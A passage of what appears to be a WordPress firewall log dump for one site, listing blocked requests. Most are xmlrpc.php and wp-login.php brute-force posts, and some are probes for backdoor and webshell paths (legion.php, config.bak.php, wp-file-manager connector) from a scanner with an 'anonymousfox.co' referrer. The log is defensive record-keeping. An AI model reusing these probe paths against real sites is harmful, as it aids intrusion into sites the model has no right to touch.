Firefox\\/96\"}','fum1Vi3cZkw0axI8pjJU2PvL',0,1665852649.8932,18629,'','POST',403,0,515,0,1,'',0),('103.166.182.177',1738978993,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','aCnVSlPYjIh7suEoRtWcHBX3',0,1665852649.9341,18528,'','POST',403,0,515,0,1,'',0),('162.144.21.93',2727351645,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','4om1WSDCeQRHzV8kUFM6hPXa',0,1665851761.9386,17890,'','POST',403,0,515,0,1,'',0),('81.88.52.134',1364735110,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','S496VugXlIDv2yZfWsdCPoEA',0,1665851351.8106,16024,'','POST',403,0,515,0,1,'',0),('162.241.62.247',2733719287,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','EVAYWeFy9cCqBsHzrtdniwv1',0,1665851763.4925,16309,'','POST',403,0,515,0,1,'',0),('159.65.239.34',2671898402,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','AOIGDmyHJ7fxYvcCEznoB52k',0,1665851349.2946,18540,'','POST',403,0,515,0,1,'',0),('209.141.49.253',3515691517,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10.7; rv:31.0) Gecko\\/20100101 Firefox\\/31.0\"}','t2a9UweXQYN5s37GuJzO6d8C',0,1665849732.6101,1186,'','POST',403,0,600,0,1,'',0),('209.141.55.206',3515693006,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','sgnVrD3680XP2jMSTxQLmo5F',0,1665866512.0584,1225,'','POST',403,0,600,0,1,'',0),('103.166.182.177',1738978993,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','CEpD9qYGIfyZm5VzlAvhURbX',0,1665866482.3678,563,'','POST',403,0,515,0,1,'',0),('47.107.33.26',795549978,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','FVvDstGz3LlPA2fNjMHnoYk4',0,1665866480.1150,2221,'','POST',403,0,515,0,1,'',0),('134.19.179.179',2249438131,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','bXfSPKLQAJyG0Yj2Ihtz357c',0,1665865541.9565,477,'','POST',403,0,515,0,1,'',0),('205.185.116.156',3451483292,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2; WOW64; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','8NFURSgWp3OVXuzMlwZhnrEi',0,1665865616.9672,457,'','POST',403,0,600,0,1,'',0),('185.76.77.160',3108785568,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','dEqRJTUcFQ4h5meLD9sINf8r',0,1665860705.7032,15681,'','POST',403,0,515,0,1,'',0),('185.76.77.160',3108785568,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','KMUehoBfrksPpbugJ0cSdnY4',0,1665860702.8929,18492,'','POST',403,0,515,0,1,'',0),('108.167.132.70',1822917702,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','48ujWXyrDxs6aHIJETgt3GvZ',0,1665859930.6090,2498,'','POST',403,0,515,0,1,'',0),('108.167.132.70',1822917702,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','CyqBLoNtZVFWclUi1A2nJbgK',0,1665859931.3310,1300,'','POST',403,0,515,0,1,'',0),('157.245.166.98',2650121826,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','SbNAMX60JOdhB7WUyQ9tDVHE',0,1665856574.1010,18361,'','POST',403,0,515,0,1,'',0),('157.245.166.98',2650121826,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','N8TELxO4isFnGpzHaokDhl9P',0,1665856575.1623,17341,'','POST',403,0,515,0,1,'',0),('162.241.226.109',2733761133,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','1ZSKj7OrzUI2u0pPb5TFhGNt',0,1665854944.8451,518,'','POST',403,0,515,0,1,'',0),('194.163.132.194',3265496258,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','IPbZ0wN8YMXVyive3sTmnWpS',0,1665854940.4624,2359,'','POST',403,0,515,0,1,'',0),('46.101.103.136',778397576,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','tgzTupHhikyCOYrKB4RcQ052',0,1665854652.1156,2377,'','POST',403,0,515,0,1,'',0),('190.171.170.94',3198921310,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','fwXMhUy8NDkTAL7Si9HmOzgE',0,1665853882.4487,17951,'','POST',403,0,515,0,1,'',0),('46.101.103.136',778397576,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','SDfxvPsAYbJMHEwFodWBajCe',0,1665854652.2129,2197,'','POST',403,0,515,0,1,'',0),('209.145.54.196',3515954884,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','hpEbIJLa2l0uUKTZ91gfWCQM',0,1665853884.6061,15749,'','POST',403,0,515,0,1,'',0),('119.2.47.78',1996631886,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','aG5zW42K8yoBZAHPvpVeYgIc',0,1665853628.1941,18711,'','POST',403,0,515,0,1,'',0),('119.2.47.78',1996631886,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','hifbd0QAWqsTMjZ1S8IrmD3z',0,1665853628.1828,18728,'','POST',403,0,515,0,1,'',0),('192.64.113.147',3225448851,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','waZTeo5jyN3lVf7J1EQCikPp',0,1665859345.0400,3208,'','POST',403,0,515,0,1,'',0),('72.9.158.112',1208589936,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','SpnEOiuFdRblrITP6h47wBZs',0,1665859119.2511,17973,'','POST',403,0,515,0,1,'',0),('72.9.158.112',1208589936,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','8GZ70BCFpnzyAVLRPciYX2Oo',0,1665859117.2773,19921,'','POST',403,0,515,0,1,'',0),('157.245.140.35',2650115107,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','VdsR8yD2rgxSpqvh6WFlUMt0',0,1665858528.6751,17599,'','POST',403,0,515,0,1,'',0),('185.36.81.21',3106165013,'','http://cteisys.com/wp-content/uploads/upload_index.php?auth=test','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/75.0.3770.100 Safari\\/537.36\"}','r2u0P5moSEveIW8ybCApVJhq',0,1665858844.4682,12452,'','GET',403,0,700,0,1,'',0),('54.37.74.123',908413563,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','upskJFW78YXSdcrgtOyRnv6B',0,1665858540.0802,6090,'','POST',403,0,515,0,1,'',0),('202.162.205.236',3399667180,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','XOVEyACkM90opQUrzsS5WLaI',0,1665858316.3631,17681,'','POST',403,0,515,0,1,'',0),('35.195.135.67',600016707,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','M0ko1tg8C3dETYsmZxqaQS9D',0,1665857699.0004,21412,'','POST',403,0,515,0,1,'',0),('202.162.205.236',3399667180,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Q5fICWDh2isHetBvbjoOxaFJ',0,1665858314.7596,19284,'','POST',403,0,515,0,1,'',0),('162.241.174.216',2733747928,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','SPvzyN3uGXnVcDJQ2qREkmrx',0,1665856809.5084,1491,'','POST',403,0,515,0,1,'',0),('103.129.178.69',1736553029,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','VcwGjatWkbzLdRuq8Nn5KexU',0,1665865501.9073,1746,'','POST',403,0,515,0,1,'',0),('210.211.113.130',3537072514,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Hu6yD4fAeaCPJtrvcE08GboI',0,1665865247.9123,18740,'','POST',403,0,515,0,1,'',0),('139.59.228.23',2335958039,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','rTsgjEiPuqxBNWUkXoRdtQH2',0,1665864532.8276,11762,'','POST',403,0,515,0,1,'',0),('110.40.133.172',1848149420,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','z8fYEhGeLHrWNJ9nSpdAm65X',0,1665864535.0671,9528,'','POST',403,0,515,0,1,'',0),('13.52.252.69',221576261,'','http://cteisys.com/wp-content/plugins/ioptimization/IOptimize.php?rchk','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','sd0wUHlZnvaVyR8EkjMTCut9',0,1665864402.2982,11417,'','GET',403,0,700,0,1,'',0),('8.210.102.36',148006436,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','UEa1dTfRumyYMIbw304jivPZ',0,1665864282.1801,624,'','POST',403,0,515,0,1,'',0),('111.90.150.28',1868207644,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','LJAfwne5dz7rxjtipNEMFgch',0,1665863356.9243,18320,'','POST',403,0,515,0,1,'',0),('162.14.71.142',2718844814,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Mo2Q3SOmI7CdL8cwhRsU4zr1',0,1665863589.9081,1750,'','POST',403,0,515,0,1,'',0),('150.230.247.143',2531719055,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','oJ3KIkzhwRPrg2fHiQNAMG45',0,1665862447.4339,518,'','POST',403,0,515,0,1,'',0),('143.244.162.250',2415174394,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','F8Gw9eZXSPl1txDkjoq35AvU',0,1665862675.9100,16354,'','POST',403,0,515,0,1,'',0),('103.171.181.53',1739306293,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','JQoLbxg71c3VT8DRlGYEPv0O',0,1665862425.5673,18966,'','POST',403,0,515,0,1,'',0),('167.71.106.216',2806475480,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','NEkpLd7lJ3jzowHm4e0YOvTD',0,1665861770.2053,10927,'','POST',403,0,515,0,1,'',0),('116.255.178.218',1962914522,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','MBnJ4CjDQoORU28LeHq5TbGK',0,1665861563.3146,2199,'','POST',403,0,515,0,1,'',0),('116.255.178.218',1962914522,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','HhgDdbisJwE1ljtLyvZG6N9M',0,1665861563.3142,2292,'','POST',403,0,515,0,1,'',0),('47.107.33.26',795549978,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','TXD8PbNsZW90hCvx7Qu3OgtJ',0,1665860909.5113,18229,'','POST',403,0,515,0,1,'',0),('62.102.148.187',1046910139,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','QoRxn9v3iFHhAbWya0uClZNr',0,1665864264.7566,2293,'','POST',403,0,515,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/legion.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','zim7ASvOILQR5f3hEu1Ul2TX',0,1665881370.8235,289,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/wp-content/wp-old-index.php?action=login&pass=-1&submit=','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','mN8FxHnhA21zYbjiQSKCGg4a',0,1665881369.0018,286,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/haders.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','7JaPdlpBAGf2OWZVnLIQub1k',0,1665881365.5421,1517,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/wp-content/plugins/wpconfig.bak.php?act=sf','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','IozEPDZfF6UCJhKQmXvy7Nxn',0,1665881361.3905,282,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/wp-content/plugins/ubh/up.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','OGb6qrmEZA4Nd1FjPtulzWSi',0,1665881356.5790,274,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/wp-includes/wpconfig.bak.php?act=sf','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','u5HPiCGdkIxQUTNwBfy2X4rs',0,1665881359.2846,341,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','https://cteisys.com/wp-includes/css/wp-config.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','FUfxvygJY9c2G6rWSQTVlpMo',0,1665881340.0084,11433,'','POST',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/wp-content/plugins/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','yxTjHVR8ENMUebDvrmhGzJ6p',0,1665881315.2432,327,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/wp-content/themes/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','p6xeuAVEXfy34CYjkUHmcKvs',0,1665881308.8120,298,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/wp-includes/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','23GPImr604Bdev5tOLHoV8Sc',0,1665881305.4501,287,'','GET',403,0,700,0,1,'',0),('162.241.120.248',2733734136,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','vHbFDmPjZIiWo6EQUCg2eBaT',0,1665871537.0723,18917,'','POST',403,0,515,0,1,'',0),('162.241.120.248',2733734136,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','AvL5FmuPO0GYQ2ei1dUNrn73',0,1665871538.1663,17820,'','POST',403,0,515,0,1,'',0),('198.211.115.226',3335746530,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','BHETuxb6ZzNLVQ4kIh27nefm',0,1665870441.6197,2519,'','POST',403,0,515,0,1,'',0),('167.99.54.31',2808296991,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','bAlw8OpoFDtCIZ0ME1zsRHjy',0,1665870724.6543,18124,'','POST',403,0,515,0,1,'',0),('198.211.115.226',3335746530,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','aoNQZUwc4zkqxHRygbmIlfeY',0,1665870441.9117,2202,'','POST',403,0,515,0,1,'',0),('103.110.84.132',1735283844,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Bry5RSU4xz9QAYvfqdI1Jk0K',0,1665869360.4843,18522,'','POST',403,0,515,0,1,'',0),('103.110.84.132',1735283844,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','lL1290WzeYvPkBg5yi37btJs',0,1665869362.1872,16816,'','POST',403,0,515,0,1,'',0),('103.74.120.192',1732933824,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','IRTuw1hDCn6aScgytBfKP8HX',0,1665868303.8011,2122,'','POST',403,0,515,0,1,'',0),('164.68.99.251',2755945467,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','2xTkrlwHhUpSJ3PdmvVj8n0Y',0,1665868574.9834,2236,'','POST',403,0,515,0,1,'',0),('103.74.120.192',1732933824,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','VCblwELXt8ojIkZihr62eROn',0,1665868303.2399,2680,'','POST',403,0,515,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/wp-content/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','G5Lo9eBIZ0V3OgmRjM241DEC',0,1665881303.9676,283,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/wp-admin/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','yobNmZUsV2E6r1jkDgQRcnFi',0,1665881301.9085,272,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','fYjQ7dG9AS5wXDsHMBnLFzme',0,1665881300.4088,310,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/old-index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','J0unmzMqCYysdSiKgtljD498',0,1665881297.3061,289,'','GET',403,0,700,0,1,'',0),('35.198.25.12',600185100,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','24VjeETbtfRdZ7LrUAvDXg5k',0,1665881290.5760,5641,'','POST',403,0,515,0,1,'',0),('198.98.50.19',3328324115,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','0V7c1KRdlDqrw8Ax9t6WmkuG',0,1665874778.0287,493,'','POST',403,0,600,0,1,'',0),('167.99.78.164',2808303268,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','mX1yLh5QiJSHMF0nZBANxOjb',0,1665874074.8975,8079,'','POST',403,0,515,0,1,'',0),('134.209.105.240',2261871088,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','pd2f6waYALDmGvJMz9kgt8qb',0,1665873772.4354,16195,'','POST',403,0,515,0,1,'',0),('134.209.105.240',2261871088,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','xtv9yGic2fZzEOp6FYRT0erm',0,1665873770.8763,17724,'','POST',403,0,515,0,1,'',0),('109.248.148.195',1845007555,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','UnfMOzdpcgtl9SkWiN1sEZX4',0,1665873323.9502,3722,'','POST',403,0,515,0,1,'',0),('13.52.252.69',221576261,'','http://cteisys.com/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','XIigz28cu7y4UjaxwShpRKML',0,1665873128.6007,302,'','GET',403,0,700,0,1,'',0),('209.141.47.94',3515690846,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','tXqI6rgHZ2Ki0Sm1YvfAGjFw',0,1665872855.1585,591,'','POST',403,0,600,0,1,'',0),('47.57.186.73',792312393,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','wDbgCNd4A0Ej9yltPFO5iKoX',0,1665872636.1773,19014,'','POST',403,0,515,0,1,'',0),('198.98.50.216',3328324312,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','CE8FW92DvP6qGO4eBMoytl5z',0,1665872237.8977,15532,'','POST',403,0,600,0,1,'',0),('47.57.186.73',792312393,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','PskwM15rGfyD8zxZvTBSAHRb',0,1665872637.1873,18000,'','POST',403,0,515,0,1,'',0),('80.77.135.125',1347258237,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','rS9ov7PUV6QEzhZqkp5CHFiJ',0,1665871815.5564,13440,'','POST',403,0,515,0,1,'',0),('111.90.145.188',1868206524,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 